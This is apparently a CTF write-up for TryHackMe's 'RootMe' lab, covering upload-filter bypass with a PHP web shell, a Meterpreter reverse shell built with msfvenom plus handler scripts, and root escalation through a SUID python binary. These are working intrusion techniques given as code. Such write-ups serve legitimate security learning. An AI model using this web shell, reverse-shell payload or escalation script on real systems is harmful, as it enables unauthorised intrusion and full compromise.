Intro
Hi, after some time I'm writing a small write-up again. Today it's about the CTF "RootMe", which can be found on the TryHackMe platform. You have to find 2 flags in this challenge. Simply create an account there, and off you go 😛
Footprinting & Enumerating
Ok, let's go! First, as always, I ran a port scan to see which services are running on the machine.
Here you can see that 2 services are running: SSH and an HTTP server. It is interesting that the web server simply sets a PHP session cookie right away, so we already know it runs PHP. We'll look at this service first 😀
I first just went to the HTTP server to look at the page.
Ok, looks quite nice. Let's have a look at the source code of the page to find possible vulnerabilities 😀
OK, it loads a CSS and a JS file, which we quickly realize doesn't help us, too bad. The most useful thing to do now is to run Nikto and GoBuster against the page to look for vulnerabilities, hidden directories and files.
- Nikto v2.1.6
+ Target IP:          10.10.125.186
+ Target Hostname:    10.10.125.186
+ Target Port:        80
+ Start Time:         2020-11-27 16:45:35 (GMT1)
+ Server: Apache/2.4.29 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /panel/: Admin login page/section found.
+ 7889 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2020-11-27 16:51:25 (GMT1) (350 seconds)
+ 1 host(s) tested
Nikto shows that there is a directory "/panel/", which could be an admin panel. Let's have a look at that right away. GoBuster finds this directory as well.
Initial access
GoBuster even shows that there is a directory "/uploads", which points to a file upload. Ok, if we go to the "/panel/" directory, we get this page.
And indeed, we are dealing with a file upload. The only question is whether we can also upload PHP files, or whether there are upload restrictions. To test this we can use a small web shell.
<?php
// minimal web shell: runs the "cmd" query parameter and returns its output
echo system($_GET['cmd']);
?>
We simply upload this and intercept the request with Burp Suite. We then adjust the request so that the Content-Type is "image/jpeg".
After that we forward the request and find out that the upload didn't work: it was blocked. So the filter does not rely on the Content-Type header alone.
Ok, we can try changing the file extension to an image extension as well, to see whether that gets past the filter.
We forward that request too and check whether it worked this time. Yes! It worked.
Well, let's have a look in the directory "/uploads". Because that's where the shell should be.
That already looks quite good. The problem is that we can't do much with the file, because it is served as a JPEG and not executed. The best thing would be to check which alternative extensions the server still hands to the PHP handler (this depends on Apache's handler configuration, not on PHP itself), so that the file is treated as a PHP script. Possible and valid file extensions for PHP would be:
- .php3
- .php4
- .php5
- .phtml
Let's try the extension .php3 😀 The upload goes through. Let's look in the "/uploads" directory to see if the file is there and whether we can execute commands now. The file is there, but it is not interpreted. So we try the extension .php5.
Maintaining access
We see that it worked with the .php5 extension, which means the server's PHP handler is evidently still configured to treat .php5 files as PHP, a leftover from the PHP 5.x days. We can also see under which user we are running on the system. From this point we create a Meterpreter shell to get proper access to the system.
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 > msf.php5
Upload this as well; it should look like this in the end.
Now we start Metasploit and use exploit/multi/handler to catch the reverse TCP connection so we can interact with it 😀
Now that we have access, we can look around the system and find the 2 flags. But before that, let's get a proper bash shell with a pseudo-terminal, which interactive tools need. This can be done quite fast with Python 😀
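The payload and handler setup as an added example (these are not the write-up's own commands). It wraps the msfvenom call from above and writes a matching msfconsole resource script; LHOST and LPORT are placeholders you pass in, while the module and payload names are Metasploit's real ones. The check that matters in practice is that the handler's payload is the same one msfvenom built, otherwise the connection comes in but never stages.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: build the PHP Meterpreter
# payload and a matching multi/handler resource script, then start the listener.
set -eu

build_payload() {                   # build_payload <lhost> <lport> <outfile>
    msfvenom -p php/meterpreter/reverse_tcp LHOST="$1" LPORT="$2" -f raw -o "$3"
}

# PAYLOAD must match what msfvenom generated. ExitOnSession false keeps the
# listener alive, so re-uploading the file after a lost session just reconnects.
write_handler_rc() {                # write_handler_rc <lhost> <lport> <rcfile>
    cat > "$3" <<EOF
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j
EOF
}

# Usage: ./handler.sh <LHOST> <LPORT>   (writes msf.php5 and handler.rc)
if [ $# -eq 2 ]; then
    build_payload "$1" "$2" msf.php5
    write_handler_rc "$1" "$2" handler.rc
    msfconsole -q -r handler.rc
fi
```

After msfconsole is up with the job running, upload msf.php5 through the panel and request it from /uploads/ once; the session appears in the console and `sessions -i 1` attaches to it.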
python -c "import pty; pty.spawn('/bin/bash')"
User Flag
Navigating to the directory "/var/www" to see whether there are other directories, we find a file named "user.txt". Let's read it; maybe we will find more clues.
Privilege Escalation
Oh, that's our first flag 😀 Ok, let's see how we can get root rights. The 2nd flag should be in the root user's home directory, as usual. To find a way in, I list all SUID files, as usual, to see whether any of them can be used for privilege escalation.
What we notice is that python has the SUID bit set. We can take advantage of that: a SUID interpreter runs with the file owner's effective UID, so it can spawn a shell that keeps those privileges.
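The enumeration and the escalation step as an added example (not the write-up's own commands): list setuid files, confirm that the interesting one is actually owned by root, and use the SUID python to spawn a root shell. The python one-liner is the standard technique for a setuid interpreter (as documented on GTFOBins); the path to python is whatever the SUID listing shows on the box.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: SUID enumeration and the
# root shell through a setuid python interpreter.

# All files with the setuid bit set, regardless of owner.
list_suid() {
    find / -perm -4000 -type f 2>/dev/null
}

# True if the file has the setuid bit (the shell's -u test).
is_suid() {
    [ -u "$1" ]
}

# Only a setuid binary owned by root gives root; check the owner explicitly.
is_suid_root() {
    [ -n "$(find "$1" -maxdepth 0 -user root -perm -4000 2>/dev/null)" ]
}

# os.execl replaces the python process with sh; "-p" keeps sh from dropping
# the effective uid back to the real one, which it otherwise does on startup.
suid_python_shell() {               # suid_python_shell </path/to/python>
    if ! is_suid_root "$1"; then
        echo "$1 is not setuid root" >&2
        return 1
    fi
    exec "$1" -c 'import os; os.execl("/bin/sh", "sh", "-p")'
}

# Usage: ./suid.sh --list            (enumerate)
#        ./suid.sh /usr/bin/python   (escalate through a SUID python)
case "${1:-}" in
    --list) list_suid ;;
    "")     echo "usage: $0 --list | <suid-python-path>" ;;
    *)      suid_python_shell "$1" ;;
esac
```

Once in the new shell, `id` should show `euid=0(root)`; without the `-p` flag you would be dropped straight back to the unprivileged user, which is the most common reason this step "doesn't work".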
Rootflag
Well, now that we have root privileges, we can take a look at the root user's home directory to see if that's where our last flag is.
Ok, our last flag is there. Just read it out and we're done. That concludes the challenge.
This challenge was fun to do, and I found it very refreshing. For beginners it is definitely recommended 😀
I hope you enjoyed it and see you next time 😀